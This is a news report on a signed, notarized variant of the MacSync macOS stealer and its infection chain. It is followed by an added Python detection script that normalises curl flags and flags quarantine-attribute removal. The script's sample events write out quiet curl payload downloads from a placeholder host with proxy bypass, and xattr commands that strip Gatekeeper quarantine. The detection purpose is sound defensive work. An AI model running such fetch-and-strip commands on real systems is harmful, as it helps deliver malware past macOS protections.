A new version of the MacSync information stealer has surfaced, and it marks a tactical shift in how macOS malware gets past the platform's built-in defences. Security researchers at Jamf found the malware being distributed as a Swift application that is both code-signed with a developer certificate and notarized by Apple, so it passes the Gatekeeper and XProtect checks that would otherwise block unverified software. Posing as the installer for a messaging service, it raises less suspicion than a bare download and no longer needs the victim to paste commands into Terminal, as earlier MacSync campaigns did.
The infection chain begins when a user downloads a disk image named zk-call-messenger-installer-3.9.2-lts.dmg from a distribution website set up for the campaign. Because the application inside the disk image carries a valid developer signature and has been notarized by Apple, it launches without the security warnings that normally greet unsigned software. Even so, the installer still instructs the user to right-click the file and choose Open, the classic social-engineering step used to override Gatekeeper's block on apps that are not notarized, which a notarized build does not actually need. Apple has since revoked the certificate associated with the malicious code, so Gatekeeper refuses the app on subsequent launches; this does nothing for machines that were already compromised.
Once launched, the Swift-based dropper does not deploy its payload immediately. It first runs several environmental checks to confirm that the system is worth infecting and to frustrate analysis. These include verifying that the machine has a working internet connection and enforcing a minimum interval of one hour between executions. The rate limit keeps the malware from running repeatedly on the same machine, which could otherwise draw the attention of endpoint monitoring tools or network administrators.
The dropper then prepares the system by stripping the quarantine attribute (com.apple.quarantine) from its files, the flag macOS sets on downloaded content and uses to decide whether Gatekeeper must assess it, so that later stages are not held up by those checks. With that done, the application uses a helper component to download and run an encoded script. This script is the actual engine of the information-stealing activity, letting the attackers harvest sensitive data from the compromised Mac while keeping a relatively low profile on the device.
Analysis of the commands used to fetch the second stage shows a noticeable change in style compared with older MacSync versions. Researchers noted that the malware now invokes curl with modified flags: the clustered short options of earlier variants are split into separate ones, and an option is added so that the request bypasses any configured proxy server. These small changes to otherwise ordinary commands suggest an effort to slip past signature-based detections keyed on the exact flag string, and to make sure the download succeeds in networks where a proxy would otherwise intercept it.
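The flag-splitting described above only defeats detections that match the literal command string. The following is an added example, written for this edit and not code from Jamf or from the malware, showing how a detection can normalise curl invocations so that `-fsSL` and `-f -s -S -L` produce the same fingerprint, and how the same scan can flag removal of the quarantine attribute from the previous paragraph. The report does not name the proxy-bypass option; `--noproxy` is assumed here as the obvious candidate. The option tables are a partial subset of curl's, and every event, URL and path in `SAMPLE_EVENTS` is constructed for the demonstration, not an indicator from the report.

```python
"""Normalise curl invocations and flag quarantine stripping in process events.
Added example; not code from the Jamf report or from the malware."""
import os
import shlex

# curl short options mapped to their long names. Assumption: this subset is
# enough for a download-stage signature; it is not curl's full option table.
SHORT_TO_LONG = {
    "f": "fail", "s": "silent", "S": "show-error", "L": "location",
    "o": "output", "O": "remote-name", "k": "insecure", "I": "head",
    "x": "proxy", "A": "user-agent", "H": "header", "d": "data",
    "X": "request", "u": "user",
}
# Options that consume a value. Both "-o /tmp/x" and the clustered "-so/tmp/x"
# must be handled, or the value is mistaken for a URL.
SHORT_WITH_ARG = {"o", "x", "A", "H", "d", "X", "u"}
LONG_WITH_ARG = {"output", "proxy", "noproxy", "user-agent", "header",
                 "data", "request", "user", "connect-timeout", "max-time"}


def normalize_curl(argv):
    """Expand clustered/short curl flags into {long_name: value} plus the
    positional URLs, so "-fsSL" and "-f -s -S -L" compare equal."""
    flags, urls = {}, []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and len(tok) > 2:
            name, eq, val = tok[2:].partition("=")
            if name in LONG_WITH_ARG and not eq:
                i += 1
                val = argv[i] if i < len(argv) else ""
            flags[name] = val if (eq or name in LONG_WITH_ARG) else True
        elif tok.startswith("-") and len(tok) > 1:
            for j, ch in enumerate(tok[1:], start=1):
                name = SHORT_TO_LONG.get(ch, ch)
                if ch in SHORT_WITH_ARG:
                    rest = tok[j + 1:]          # "-so/tmp/x" form
                    if not rest:                # "-o /tmp/x" form
                        i += 1
                        rest = argv[i] if i < len(argv) else ""
                    flags[name] = rest
                    break
                flags[name] = True
        else:
            urls.append(tok)
        i += 1
    return {"flags": flags, "urls": urls}


def canonical_curl(cmdline):
    """Order-independent fingerprint of a curl command's long-form flags."""
    return tuple(sorted(normalize_curl(shlex.split(cmdline))["flags"]))


def classify(cmdline):
    """Return the names of the rules that fire for one process command line."""
    argv = shlex.split(cmdline)
    if not argv:
        return []
    prog = os.path.basename(argv[0])
    hits = []
    if prog == "xattr":
        short = [a[1:] for a in argv[1:] if a.startswith("-") and not a.startswith("--")]
        # "-d com.apple.quarantine" deletes the flag; "-c"/"-cr" clears every
        # attribute, quarantine included, so both spellings are reported.
        if "com.apple.quarantine" in argv or any("c" in s for s in short):
            hits.append("quarantine_attribute_removed")
    elif prog == "curl":
        flags = normalize_curl(argv)["flags"]
        quiet_fetch = ({"silent", "location"}.issubset(flags)
                       and ("output" in flags or "remote-name" in flags))
        if quiet_fetch and "noproxy" in flags:
            hits.append("curl_quiet_download_proxy_bypass")
        elif quiet_fetch:
            hits.append("curl_quiet_download")
    return hits


# Constructed sample events standing in for EDR / unified-log process records.
# Hosts and paths are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    "curl -fsSL https://stage.example.invalid/p -o /tmp/p",
    "curl -f -s -S -L --noproxy '*' https://stage.example.invalid/p -o /tmp/p",
    "curl -sSL --noproxy=* https://stage.example.invalid/p --output /tmp/p",
    "xattr -d com.apple.quarantine '/Volumes/Installer/Installer.app'",
    "xattr -cr '/Volumes/Installer/Installer.app'",
    "curl -I https://www.example.invalid/",
    "ls -la /tmp",
]


def scan(events=SAMPLE_EVENTS):
    """Map each event to the rules it triggers (an empty list means clean)."""
    return {e: classify(e) for e in events}


if __name__ == "__main__":
    for event, hits in scan().items():
        print(f"{hits or ['-']}\t{event}")
```

The point of `normalize_curl` is that the rule in `classify` reasons about option names, not about the bytes of the command line, so splitting or reordering flags changes nothing; extending the option tables to curl's full set is the remaining work for a production rule. The `xattr` branch deliberately catches `-c` as well as `-d com.apple.quarantine`, since clearing all attributes removes the quarantine flag just as effectively.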
Source: New MacSync macOS Stealer Uses Signed App To Bypass Apple Gatekeeper



